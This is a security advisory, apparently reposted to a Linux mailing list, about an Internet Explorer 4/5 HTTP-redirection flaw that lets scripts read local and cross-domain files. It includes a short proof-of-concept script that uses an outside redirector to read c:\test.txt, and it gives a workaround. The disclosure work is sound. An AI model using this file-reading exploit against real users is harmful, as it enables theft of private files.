IE HTTP redirection problem
----------------------------------------------------------------------------
----
SUMMARY
Internet Explorer 4.0 and 5.0 under Windows 95 and NT 4.0 allows reading
local text and HTML files and files from any domain (reading files of
other types is probably possible as well). Window spoofing is possible and
it is also possible in some cases to read files behind a firewall. This
vulnerability may be exploited using HTML email message or a newsgroup
posting.
DETAILS
The problem is something like a race condition immediately.
After:
window.open("HTTP-redirecting-URL").
If you do:
a=window.open("HTTP-redirecting-url");
b=a.document;
Then you have access to the redirected URL's document using "b".
Exploit Code
<SCRIPT>
alert("Create short text file c:\\test.txt and it will be read and shown
in a message box");
a=window.open("http://www.nat.bg/~joro/reject.cgi?test.txt");
b=a.document;
setTimeout("alert(b.body.innerText);",4000);
</SCRIPT>
// "http://www.nat.bg/~joro/reject.cgi?test.txt" just does a HTTP redirect
to: "file://c:/test.txt"
Workaround:
Disable Active Scripting.
A demonstration page is available at:
<http://www.nat.bg/~joro/msredir1.html>
http://www.nat.bg/~joro/msredir1.html
ADDITIONAL INFORMATION
This vulnerability has been reported by: <mailto:[EMAIL PROTECTED]> Georgi
Guninski.
========================================
-------
AFLHI 058009990407128029/089802---(102598//991024)
milis ini didukung oleh :
>> http://www.indolinux.com - dunia linux indonesia
-------------------------------------------------------------------
untuk berhenti kirim email ke [EMAIL PROTECTED]
untuk melihat peraturan kirim email ke [EMAIL PROTECTED]
arsip berada di http://www.mail-archive.com/[email protected]
